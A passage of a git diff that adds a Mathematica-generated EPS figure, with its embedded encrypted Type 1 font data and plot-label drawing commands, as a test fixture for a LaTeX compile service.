+95FF040E3F72FBF29650D4DA2B6FA27F60DAC4169DC9764021F4E7E094FA25F6B5AF25602C593266 +ADED528EAE6C967E66F0BA05F258E34CF6AA5488D3F7406C2AA9D9FD9C533E827F26862D348B5223 +A690E40953F337352C8245F1861A19E5326490F2A9742917B5546884E8036DE0874363F812CF6FF9 +574DFD5BA77A1DD7C5778B2B9A2E22F2482744E2CE9323E590C60FF02412CC7AB0EC30D0EC857D27 +A4E3D8B35FD69FE28287B2160AC0BCF645A0654403D26B05041654B17D82928044BBAC40871BC3FD +D8EFC3207928BDE5D66926ED199017B223AAEBA563F2723AFFAB737F6482DD269F44ECCA3B32FA03 +FFCE3ED882B449BEE196F59E6616EF1A2F08B42B1A184727D5BD96DF83972BE1B5F8CF098F61B84A +B5BBCBF231E099CFC07D4748D43F129D123FD8051628564931E43A70BC09BF20AE2C0ABB009014AF +89753F91ACB574C5A218A47A02DA3AE44D3F688F9D96076AED9EDE7388B2935C01FD400BA7EC9574 +96E317C6931E3ED7078A53CB4CEE4E56311F4D8A368AE981606AD7E9DB0EA2A10E079476D9881596 +8C9675D9CF15E29B9328600FECCC02B484D8749B4154D69CF90997AD650D881735AA71289AE93FB5 +8C56686C1F9FB0E696CC0285A1A870373E5DCAC285A1B4FE903CC30B8ACAD2E4613873ED77D813D2 +9FA4984A7530F5B046A71011D97CDE4BAE9648AD54537A1D87A5AF1B92560DD7064F3EDD3CCFA7A4 +FBD6166D067945F103C13B3019540C3FE706804A7A00E1D28A0C26A40AC5A8845E39631A00099CE9 +88C3F12C8954EA84BF268D99E2E13726BF9C63474A5FC874CBF723BD48A5461177789E11B4F1CC63 +0FF4D60DE4F01422C1029E664782232A8BEFC38CD058135C79E015A55BA933AD8D446A81051D956E +429779863DBA60F4258DFC62D1DC3CC3862C5D310579417FEF4D7642ACBA8BA5284DC5833F581150 +ACF91709D6B3A41395960197AB43E63B8C6C2F745DEB4647E298341F3E3023D7DA22509340E28140 +97A0C193493711E60C5DA99C464D8DFC83A61291BD0E13AB6A42C81253C0F1B37E71E7706BF2D662 +76C60A3A7DECCC58E56524A200F8C6C0512FAD2FEB51F5C24109E284FADFFD8484A7A053E8EA544F +AFC1C7BA21E4824866090E542B8BB0BE603060A36D8A8CD64EC92D6037B438EA6A7F3A23E9608F29 +02E8DB10F2854D89E2CE6F093E6804299305BFF3D1601C2830F793B92CC2542A6CB0E9DA602E00FF +DEF234702D0DEFCD270F2984642F13B818F65BD407B61227A94AB11E7ACE8D40849808AB3A7E6EFE +B2D4F3B9FCD233B8497B35299DF28F651B0B2960B4545BF2C05952229EB1CF676DA761995413051E +885A529957538A8B2C6BBDCEDB2A3F4104004B880624C2F55B544EEE8DD29231386492598C2BE995 +6E7BA78FA75FAEBED43807FAF072839BAA02333D38BF4A59B1F3ACEA5C7BC188C0BE8A8BCF2069BB +E36BDB2203EAC19D249C4ACFBF8F9717111B7F4637D631D058EAE0CD4E4E8A9F0ACE1BE19B3A241C +9C6DCE2513690473D8F4A59E1A7FCC926885CC324086981FE0C6AADB8F48116822C59B1E93F53829 +77CC88B82FEEDD2B4CC6095691FFA1419D5A6850D3576C4E705C676850D0BCAB84D52791355DCC7D +70A7F5CF603B4D0D7F0CF4F25AEF44F21A2D627D45D306DE0BE1C794AB90DD1EECAB2D61A115D3D4 +AFAD1914E808B16BC868FD48208E1F915B0E8ECFD59AA5895CD7ACF95E0DCE87DD8B12F683C8EFD9 +625CD388337C262013626A06ED60556FA70A8D425D36B48E430758AB4CAD34A656F457A60E4DF933 +07C4D5B2698501E6D1F270CFF70E47DE38A5FCA2B04D7BEC3A2945EB93C49F1D366835581B42F43C +C99D71F13F45A9FF8D12E26C43E1B994BE5AB44E5309B0F936D78C93169D666DDE6D18E33A5E016F +32278897FD7E76BAFE39498C6A849F4A6D882D109C40B42488059554CC95530FBBAB2591DCFADED7 +3EE5F2F2BBF17F4A131B8126F9E0AEB4B379CEE4EAD92A1BB29E3789EC19671E77558B4DE961629F +28B49DB4D8FAAF541D23205844EAA801FEA468D26F32BF9CAC30BCA244246A55F600BFBB61C5E8C4 +10CA07319DD094770DFFC1CB700DF67097F61C46036353C8AB3A5E5198445A194BF189E20490E970 +7D2C03C1A003BC782A66841AE5DDEED2297BB6DD019C98A66A8F279748DA39C85CE2082D09210EAF +CA995591A1A3DCA52EFC9A752DAE0CFB125127DA2932AAAAD7E9850AD78D48304260B4C270EFF12B +160DEF2C2B8E30E8C137975AD20046F37A72F1355F31D878334D96313D330C24EE7350D4042AAE2F +A345EDCEB133121D4B39645B1D6114D0597C3301B4CA56DA2B4A457D7A51BD13B7AC61FE6E1CD451 +6253F606FD4B57E9F4895CAC93691EEBC2AC992CC5D122DD3FC6A9EC8FD337CD402F03F901CE7986 +2F4F4E4500617DA0F913E357BED3ED04F49FD61FD1C66606CB231C3B7A5042C7C07EAB2E02BE8CF6 +AEE5E16B4AB725B5FB5D01EAD4887E365BC2ACA579BD80E0AA686E4A08DFFC70F99132353E3D5898 +5205807271753BA3DB7264C4567DF5FE999514F28E1DD6D3E966D8810978B140F8DD9BB259078A47 +013BCF247C37F543C0899B532F34843CA56F18F688B42A12DDE2A90CA457860540B6FA138F753DAB +E7331188ED6F535480FBFE934F68EFB1C9C16D4F11EDB35F944EAE63751101928EDD0E7AFE64D7C8 +5E9CAFCBA88450DEF9122A245FC1ECCF9EF8DD94EE6A70CF16ECAB39B52597AB1E8C47B6DA4FF0DE +C7D0FABC84DDCC8C652DD7C941DB3FDCC5F0542A8F433AF9FDF4D393E123884E1DD5D359D46DAC61 +0694020BAE84B3BD4C068E3BC871BE21DA13571BB61387E207926769236776B5B31A4A462902966C +DC3D92BE171F10EF8395D2402F0C492A3FE55979CB903CFF2CD2319CE4B46481489E798A131635CB +2E70147193FE3C8F4570FD01BE10E004B17341C4DB8B029BCBBC45D31227A684E5F38F5D6F0821C3 +ED13D31DBCFF51BD759C84A98145FC86D82F871D2D83F43C3DD7FE9A064120338A7BC63A2C60667E +25B50EA1C267174B334F4437856295A6B826F54C3EA9ED39CA6909A0F6D9669F1E75A7A05CFBE7B4 +2C330668E311872177F0BE3A9B3EAE611EB48721AAC2F10C3CCD897CEA8A136E5E10C2337BC5EEB2 +FBC1A3646A6B6792CA3946BA5D4D135D929547042A2F0D0A202A4D86E3F7098C823E7AE4331CEC6B +607F6AA434180B4153F6B10DCC914A92D6D0934551BC9DDB3C78065B2177B264216AF5524D798AE6 +2A90D00A70CB36C5B9950499163C2C1B04339FA76D28E03A4D0C80FCF7BF29B8A188C67EAB6A4BE7 +8C07713C7EE09043301B5BFD60222DD0D0943180AFB286D2953A8A12661986A4812E2C0DE5B3E703 +DAB34AF0E9306A5711D286AD09A3C6AB80841491BD0E5A1D1ABE1D600CB494BC17EC4F74B45870F6 +AC41EFE16BB6C87F382DFA4B2B8DDC9C2E912FD139A2FFD5C92D836F3D749EEB985C62A376849751 +A6AC56B1F679A85FDAD9448DC7A4CFE323AFB540408547C53297DB6FE9A0B08901BC285997934A2A +1772090FBA175CF4660764B87A21A738519D5B619840D15F45DF3589E8B80A6DDF1F395B65345869 +58C7060DC131700DFF6E25962494583085E6F8BAEA557A5666E6634E4704D0C07BB0A2EB228A7BEF +EB890B4EEC638303B8005BCCE922CF3A7AE627206F2946A142B0095FF960BB8B8F9C975B6FF07479 +2D5C3DFA125B7BE7A8356D8B44E264AF6AA582DB84BA09D2FFDC2213903FE8FE16DE5EF61E518DE0 +6A29D98E217038A4CA4D219E4F114858CA493AEF0CD6495A7C5EF1ADA06AB543051B1A5213952D46 +648BE06D15B1728768BB853CE32943AB0988D172227780CE82D1A1D297D0D6ECC51B290E156645B6 +9BD54699940AB17EBE10EDF258BBA6BFEA39F4F0B066FF6B3FA16C7C72F2565CC028F249BAA4B488 +B48A2513DCC5D1E205FB874BCFE45612DF4EDAF815CDD53CBB80842B429B1AFA32D35EA58E17F4E7 +252C2C9A737AAECFC25FD8CA5520D3EA38AF71C61B88F31FB53A7F5369305D63495ADABA455C3C4C +35D9FE423A00CFBB278CD482D3FD33BEEAC1F359AD9B6AA17D60CC46FAB670ABFB3B2B4161B9EB9D +949A06CC3B734F63DE821FE0B8EA065B6F79C0601E46E8CEB6E2DE0C052771E0EC7012063F1AC46C +3FC454767469225AA266784DD77256C6FDE25D7D857FCEF2562AEBE38A9A47063AEF91449723E680 +B36D824BB95BE95C9802F7AD4DF1AF37B4777A1E116A7EEF770F0A499BC9F9675A775503091D4EBD +F55118782E3E54AEBC67A0545E8D75BA5A482C6CEC50595D45AF041664689AA4338C1428870CDC15 +BFEEF788C1D1E87B3389103225E2619120B129FDF048DF3F5DDAFF1CE87428E6BFA591B91D82720C +E4A72FBB952403435248657ECD5456CA814FA0ECBE70BC3D391AEA0A195AE8FBE92D054AD0F3E549 +841ACDCE59DCAA9DAC20348A1D05DF7B4127C75F4C6607EF8501F741CBC96AD8D429A4CA8034CA52 +9AB673EE706F1FF51DD93F45802031EEBF8F3AD29D2A74888B1CB344F88ACEB9B4DEA13ECAE0A3B7 +1FF5CAA38D0DC484B96E90251D56732B85DB8A8DBF10E0A5921121CFDFDB6EA9CA45B98584401C3F +346BD026DA2A17E75CEEB74E48667F9BF5C538623E88021F0C24EC7D082C3E1FFDE5A6F68F0F3F6D +2B61547C4C14614118F7942851B090D6C8D80BA06D9139CB5AEB0EF77DEF2376C0BF602FB1083178 +27E86DDCC00622438FD7A268C0252CA2E20DA887A9D5ED251FD5CCE811E514D702206E413DEE7528 +3A6AEF793F5E3E3B0B10E59226102DF2A7347A95B96E39C6B6ABD1FB4B7CDC0813D7390E2819EE50 +7E5458E06D43CC3BF16E40CEC4E64909615CBFCD233B5D316BC8B8B46243CDB7F2FBECA2F208D0A7 +985048E88A5E685A9EE8C3A351FFCFB522C1EE41A8E4EF0A080C0D110D2A0D8A980AF1F604D1CD52 +3CF41D08A45EB809AF11F530C138F256FFD49BC20F77005D004AC85FD563E8E8BA5F79CC60FDE714 +1416F4C14FFF281ECE2BE1D167B7B1ECE17790454F795B056CE4DF1D08F25F0E5E2A16CFA066AF97 +F3A80015068FA2A1D65F329A5CF7856114A77EE7295C7929CA27796D8C51B31347CBC7C4EEF1E75D +12237C558BE5B65DCAA4CDDCB419E543B1785DF8B225C2E9778839123E6F85E53D925C6D2FC0327A +EF9CA13D1F2F9B3E510A1A4190D3057227621788AFB6567132238BE86559BCA006B85AFBB8AFE5D7 +A8CE58AF731F2550108C6B8CD63632184B1E218F01881CB94CEBFFC310F263565A39C83C874AE474 +AA213F7DD9CB3B8446A3E47E81BACF7B16E4A80899BF2D30C28F9DE0678DF364589DA6A454398E30 +21A92AD1D8B0DC494D96A06C7568E34547F0E68829E5D15F6500ECD7403B40B5CC2A479D0F8CE3E8 +709861608AED046339BE055BAED1A6BD2311CF918E74378D893710D42A769671326E947F108A38C2 +3F92EF5C6A50EFE36E858671F17151C719B9C7D60E8E429F088616D616080DC676760BE83A3F5229 +6C4B13CA3818E3FEB56D51DB5979F28063F7D537C15493D57CAA1E55438C01C794336D9F21520484 +FE5B5BAEAD7121E3CCC5086E2F2191DBEE9527CA61CE85CC0A4D99EA29169B17A10B3D4372EA493D +48CF572E570CF48B3B7512268A9AC4CC161F97695D19412C36F1D67522E272B1C18B6122A355B43C +37636E71462503C43C1AEF5ACE34A6442075B59892BA54E9B5A99B9733BAF64161450F8ECF4FB2B2 +DA6F9AAEBC827CD9AEF94BB463935C26E1DD5DDCA5BA87E0EFB62D9D3226DC28427EC097B68C9EE1 +E47D125F884F8656C8AD55D625A8F7F1A306383A5036A12E63B6FAC4A215AC88725611EBA74B6770 +B20F45356879DB807E9C9105D14C83104B2DCB4F274A2F37152425935B3F2D1633E4444540F7411B +24C17055850C9528D912F9DD40984CA1B3BE277F82198BC99B80233B8AAB674A44B42B9123E886B7 +B3161D48B4AA24970BB75A983569690BFD4B92E6ECB410DDCA14A3BF59057397FF1AF159BE230216 +FF2F7009C3A3DDD81F2BD1F5C10C2C2F30A8095D7371427AC9D527AC6794CF8593303F786F21CCBE +36DFBE01B0ADD78DB3C9483D9DB09A9E2577A3A4296E7BD09C41F5C91B29C9D7E69EF06B5BDB66E0 +853C3DB133769BC8858121A350CADC1D61C77C1A313833D077938AB2E10EF970590256479B1549B0 +401A9C5E97F12A269A305B372F0EFC035B06AE3E2187D6E3A62DE3B4E8075F0ECF5BE32A5B97A4AC +23A7335C4AB29917129C08250DBD1D5BC123C92E821BBB1A7598E32DDDF1876C6FBB7B858FD317D7 +6022955595338AAD2BFB3B17DA11380E7473A5F566C6329E0F38D9A67E68FD4B8CFCC82FC0BD7BA3 +9A25D5BD0952CC71CF0BD7B5EE184A8E62FBB366D95AB051BC3A80E9F6C27EC100E00C4A002291B0 +4D758A9683657FCB07A2AA8B07DF585CD4205B4DC55330E8A2A367CBE966E84618ACFCAAF81C8A9D +3A3165FE5A623720A0C11CBDD5CA200100DD2C970A09B124D98987D6A2CA7CBB40DA5B585B86FCB3 +8E96F54C64A921D7A5D2F805C67339DC4FC026FB2EE533BB9700F66F4AD58949B3DB75D770C4D7C5 +C23DC720D78124A7ABF30CDFF10C708219903431C7B1A19317341CEA22AA11A588F8AF9BFA4AAC40 +31EF22F13BA597BD1E5958CEA741274197113CB0B7975424C17F73733ED30BDC0170CD0084BB7DC1 +8F031BEF2A6C44D0EA0EBB84E31D5B4C50B63DF0AF96AAF33E3C986D4B82D161E2F9049DE9710EF8 +A11BA0E08266A3547F20567E582EDB47633772D37FCCD119AF5B11F338098F185D5B055975F56092 +CC6979FF49487D69E08A4E8754FD51D29410F56E0F3EFB9C3B86253B3B0A39E9D217604F664CC696 +634D216524F976D066034DDE8EDF5E8F9644337C50C7D8E2230B38E0EE88C53DEEDB3363477E32CB +88B3ACB6931B9717FC93F8D1A9DDDA3A7D8A56783F2B651A1DE216493C34DCD17A7635D21CEC0770 +751424B599B00CE950E60D8A8B3444F1629220DF073137E2ADE1B6243C1C69BD5E10450B948BFCBA +46A841B98BCE7C86E120789C73C87E581868021E68F78CB903AA6D494331174CBF944221DEA9E567 +A2542BD399C5E471D972FAB7E8950AEFF3D91A1296E685B0BFF91367C2703DCAB10AB236DE603E3E +993C4C9020EEBFE89726AB9FB92AF9D371D7188448CAB9FD2704506C39F0842E36EB8B9AAFB1F26F +CD366E66725AD28B19FA57537757EC71B04B451F056C3AEBFA04D1C0CABC9492B6B8D239EEC36776 +D6B515ED43A66AB4342BE4C8B2027F2D008EA231A24B472DA8352A05DDEE31CBC3577E5814DD2D4E +C17A216A7C8FFB27012346C9ED12F7819B96A5B135B6196E888C9AC73D7D4B7DC370E2FBFA17FD74 +0BF516CFF69294493900BFD63721A537BEFB31C5262567103F9CEA4E8DB02964B983E1AF190ECCEF +41F552C45E9B94E29AE3F129687EC35719F591C1987A08DCED3B822344DF81A70AE78E14A81EF1A1 +A77FD5D19F7D35B7C12A473EE11C655E15DC5D3C94F226CBDA85377338BFCEA18359176CA7EED622 +84F9015F2D592E27F1037C95570CFDCA3B9B90D35DB8C341434BBF04C0E692D4C2C3F59EF386CD1C +5A8C783198EBE42C89E3B64C662F7875325982E9299C18DBD1FD2257DD964F9F9DDEEBFE56E4AE9E +8163E8C58581BFD5818BF396CCDE3A66F58E17BDD262D63E5D9AE0D0E43C304CCAC4776B87D40F6B +5AD7E625B2065FAABA81AAF2E2D32E0ACAB12DB2A9FE9C6160FBA7DE5AF019810AD9C64B2E6567B0 +F0108E8EDEC635F4BA88BDEBD3561CDBBB9063B4D19C493E0CA4F551255A7DF6BCE96C17A5DD4877 +7F654F4F114CF29ECDB9779F63EECDC04E1FA06E48701547A8F96483B4195C0DE90B0FD1B95B5F12 +5C43BB973D0B6414A994595359289B5FFEE4A08D684C2E7E3F417585581318D54DF2EEAE7CF36E2C +A1A70EA76154B88C1E4FFDF5EBC28ABE264B40583F2DE1F761DC25DF242396AE502CC63EFD6EE284 +DB37B0DF36A8833ED3EA5A1DB372C8E1F3203E6E945A53D83B87250CD72C851F68A602E7BCF92DDC +E600D518069F8900F3BCA434D21694229572D55F307E0FAFA3DAEA864BAA19F227097963CE83882D +22FB7F1AA3FE558A3669BB7FA37C0A591B4BF3E2A2FF85BFEDE5E424E0AE337EABDFD67BBF38E160 +09A687D2E7C1882DB79304D722EACA233EFA489B10E8D4D404D12A5A4683FDE377A9A952CCAB257E +ABB408D75FF130206DC3447F26E74D1D00354313E340878917177DBD2AA5A2A70E2087D551DA5181 +6FAD07F6E826DB0BF21560BB26906D3100E12AA3801D4A8BDCBF1A0A8D58F1054EE2A0DB04ADDF3F +EAF1FD6E322BBEE274A4995EFFEAAD0F24D9FB45730F6BA0F42D88BE4AEBE9777F8AF508DED61024 +EF955B26ACEC51AF5C21BAD7AD93CC0C9DBE03C0FE9637A3099E5EF329051C87FFF70042D788F21F +4DE645FEBF58374F7E38A9AFE3DE4D2888DD807A09169DA8516DFE37591C122A4798343C1A8121C7 +430F244EE5B19A21897A4423E21CE0492E75C9320E37BD65F1EACA7FC6FE032842E4D985E666E633 +AE5CC62B3449404672B284EA5C6A01E927787104ECCE1354D1C0E5AA2452B7B12937B946B74EFA98 +8C5C79EEE5ACDCFC994CAA853AFA08EB9E180C5E898FDDF8903EB0863E98A4FA537207C154CE5B98 +EF4E97FB6A1CBB07C45D34221EED26998EC864475D231FF76E830A7C0900C4B5FCB980E3F67F4EAE +3DD8086CFA1874E65C424646C7A8F84272DAB04A5984FCE3F4B89380B3A5C6F04EA3B683CC224913 +9209136336AC9349AA89690B5DE0D93E92F996BA7E346B043EBD45A35FA297DB70E9A6250B138674 +FDDFA609BE11EBA8106EEE3923B4E2657CF7A82443C25022A5DED862E8E3A5BFA7B8AC1C1B804B23 +C08A7D8FE594140E8432C1A5E183FE361B6B8C763054458798B756A6CD2535FF4667C634DF78AFBC +C87D40DCD56FFFA12CFC6EDC6A8AF41AF657E0137320624F1895D9AA84AABAC5F3653E977B054C52 +92B06FEAAAC0E5C7FD45B6654D0D9CCDF292A8489E1E6CD929F0AF25B9604CE33BD25662133CEE99 +CDBBD00F865431193767480700CA019D694B38D695CC29F732B5B39B6CE654F1AA18AC3223B60E55 +3FC3C3E114E6A2E59617BFD58AD8E429200B59E035DB7D67C8DC6C72001D005924670ECF7A06FF5F +7B3DD5556DDDE1BE5163F7CD6FC969033EBBAD85856522ECA91F2A200A75BDDA69070240D86C2D7D +959F1DBE45D488A96F308269E8262327A410D057446F596418DF4A12267A7A3FF5ADEA0846896D3A +EFE3D5C72387F7EEEE809BCCD23D1126B86C45A0F66404FAF617D03379A2E44865051E92B4C835F7 +21492147DE3DCCE47EAD192D3F10A5DD459634D6C253F4D09DD98E7DDC836EED8DE08A78A6F6FB93 +84565CF6DA8D4C948144272D5F8787643B9B550F96E42A8CFC0F1C1F2B14D83201199E9E1F5BC0E6 +51E39E16A744930F4409C61CDF9F456C7EAC5C62BD22CE0DDCCDF3755DC670FDC8FEBF09F241BF95 +1A1694BD70B9695A15653F719DF4374AFC6C27F58DD144253BDF86FC1BB3D4FEAEEB9196BCEC7168 +AF1488AB7072751FA24C6642B87DCADF4B2427631E7D7FA39D126410189CD8E24CF0A490FDC7045A +A9A83D02CAB57B9C27211FE1805080FBCEF23B86CDB19885A574C589BDB15C4CB3651FA3D2D6B619 +4449B16D927047E376A84F9423562CD548D192AD0A57E0D5B41010D1C7D87929DB6F456B0A073DF9 +A8220BEB3D4DA01518B5C85C82ABCC821BEEC1965283DABF6AF3AC55ABDDAEF1B53E6119DBB4A114 +44FB1769F9891B5DC931ADFEC8ECEFFA179427FCB08C1B149EDA70717C5E9322F3CE9405438481F3 +90968A38061EDAA2223147D6143877E4C4E645EC0A9803A933116D610491FDC639DF69B418156772 +E14A428864982D3230EFFAA1D2D3388B0F70D8FE202CDD6CB0E97B3290ECCF4A1A69D93C11D3D735 +FF0B5A9A161A86CA4F16B7C231B8BF71D5083697B2F24C0BDAA6E83E5DD2222DA248D4ED3B5509CC +7CA40D8D5A2507A1D40FC1AE9486343CA2B2C65B6CED9B1F4C0535ADF7BECCE45E1DB74C7417B06D +897C6ECDD05F068857D931B3D960103628675BE2FB82DA774ED3786670D8C2BA4ECC36C203C7F7E0 +9C97A09E3B2E2C3EC30B53A8825519B664D09F149AB73F183A4A22C8F20E2052F76649AB881BA28C +6C3C3950EA9B3961F87F6AEFF24DD7B4E10DE28C15DCB27F593F98CBC9CDE19360C5531B2A0C6DC1 +8FAE2832AF49BF9522C068F3036516F711AADEE496EE4E3EFA2F55EA4891DEC6D8A868E0B0017076 +3040CA4D42A73A71057DFE315FF8625BBD74F41E5CA77B7DF096C2F4F0D51B1184CA9F2C8517FCB3 +956C44873D630E94EAA1D2D1451B332770172B2D7A21ECAC864C612235C0B39ADF55EF074F2073FA +D3B54A66B07AEA1FB495A9F7269BD1C07692B0B762DA6881EE6B265ACED0BF0794C0397F8D8B13FF +275BE77561067E2C1FA536131184682BFD32384C6488012D29E8E55838E5A5AA7C40C20AB6B03BFD +BF4EFD2001A612100D585BAC1C77C1CB1ADAF2B000E09686091AB7D1AB6ADE395A03580BD78E961D +14D052E7D4A61227534B55FACAFC4E8F9326DE35BA53A463F7D94B705698300771185DB19E78FABC +D0AE4FCE005B79C795B692F2D9C00B6A61D4B343C35E417BBA169EE82A2E4AE204A126B08A94191C +6E5B5E8328A147BD6ED5A5AD5C9143A50C47789DCFA699720336AFFBD6B1646D8C35139B0DC34340 +C76C7E4FD72DABF80BF64BA04742D07B380E20A678EBCB19057F2346FEC653F1302992279DCCD2E8 +902B2B8F78435AF3400DAE319E94E3148BA88C056701D524DD67FF368C85EC6366F31689A62FFC03 +4BE436588ECBB8B41E8C43112F3B65F50D20A5EC51A26FE899E74731B01C7771F75B76070DC0B223 +1845BE9C09670E65C4DF54C0FB36511B735251AEEBD13FDC0FCFC3134D8DA826E4100521CFEAB202 +B83267EB3F69AEEA25FDE1E9C86407E38AB4CA2D1B91607EFC96DDC5BB10FCD46DEAA5FFED196959 +12302ED55DFACFDC6F22C1528AE3A9902B75F46A489352C87B0F5056FD149DDE67219A3C3D1DD875 +BAD81AD443E0F90DC79D979E10B4262DD20B255B04BBBE5C988B23667135CC61D988928F5F07753A +C76807203942F6B62A178A1E5CBBFBBAEBE735D09B747BF00C360F2E2B6C9F2261F7DB018EDF40B1 +3DB4B7962D4D2F858E1FA6376F21ED9CEA4BEE07FFE27F136BF60352AFB71CDBFF7E65F6B4624E16 +C6E5AB7FF60B4711A178FEE691DD8D362B14175A69070FBC5B9EB15248E4DFDA3C9453335D0E1EB2 +7714E4624C7215A73B53402B02CF7AA05A14CE1E5AE161B75F218BF0EE1215D3CD925D5ACB7DBD2E +BD8E4405433F432C491999794C814D5B384B7A1C0AB28A11CBD0A6EA12678508CF86232309B0BBF7 +EEA929FB7951F5A6B367C5AC57DD7D3B3C1E2188DD4664D14FBC32B1A1EB53D7EE7F55F4D5C2D014 +528EBB7F0E595F7618721451EE6B83EB240A6C4D33377893D4EF542F47EB2845A09759D5554C74DC +5E9109FFC8C929CF1AC446D8149957720EE4FB670D3CA61378549DB992126B23618CF49361D6D4B1 +C73C3D37E4A4465ABB349CFA34E9351D1192E366267EDF02DE432ABC80792B0CFD41FFD0AAA42E63 +3F5B2177A351D33477C636CA573CB02C07F7F7A41C9F1BC4C112BD6459DD130757D2BD6F47495C3F +92E99522871DAC2865 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +cleartomark{restore}if + +%%EndFont +%%EndResource +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(0) N +P +p +31.5 9 m +(2) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -118.485 -136.705 ] concat +1 w +[ ] 0 setdash +P +P +p +np 181 96 m +181 112 L +219 112 L +219 96 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 181.505 96.904 ] concat +1 w +[ ] 0 setdash +p +np -1.505 -1.904 m +-1.505 16.096 L +38.495 16.096 L +38.495 -1.904 L +cp +clip np +p +np 0.495 0.0956 m +0.495 13.096 L +37.495 13.096 L +37.495 0.0956 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -1.505 -0.904 m +-1.505 15.096 L +38.495 15.096 L +38.495 -0.904 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(0) N +P +p +31.5 9 m +(5) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -181.505 -96.904 ] concat +1 w +[ ] 0 setdash +P +P +p +np 267 3 m +267 19 L +305 19 L +305 3 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 267.864 4.035 ] concat +1 w +[ ] 0 setdash +p +np -1.864 -2.035 m +-1.864 15.965 L +38.136 15.965 L +38.136 -2.035 L +cp +clip np +p +np 0.136 -0.0353 m +0.136 12.965 L +36.136 12.965 L +36.136 -0.0353 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -1.864 -1.035 m +-1.864 14.965 L +38.136 14.965 L +38.136 -1.035 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(0) N +P +p +31.5 9 m +(7) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -267.864 -4.035 ] concat +1 w +[ ] 0 setdash +P +P +p +np 295 86 m +295 102 L +328 102 L +328 86 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 295.617 86.954 ] concat +1 w +[ ] 0 setdash +p +np -1.617 -1.954 m +-1.617 16.046 L +33.383 16.046 L +33.383 -1.954 L +cp +clip np +p +np 0.383 0.0458 m +0.383 13.046 L +32.383 13.046 L +32.383 0.0458 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -1.617 -0.954 m +-1.617 15.046 L +33.383 15.046 L +33.383 -0.954 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(1) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -295.617 -86.954 ] concat +1 w +[ ] 0 setdash +P +P +P +P +P +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +%Trailer +%EOF diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/main.tex b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/main.tex new file mode 100644 index 0000000..76fd8e5 --- /dev/null +++ 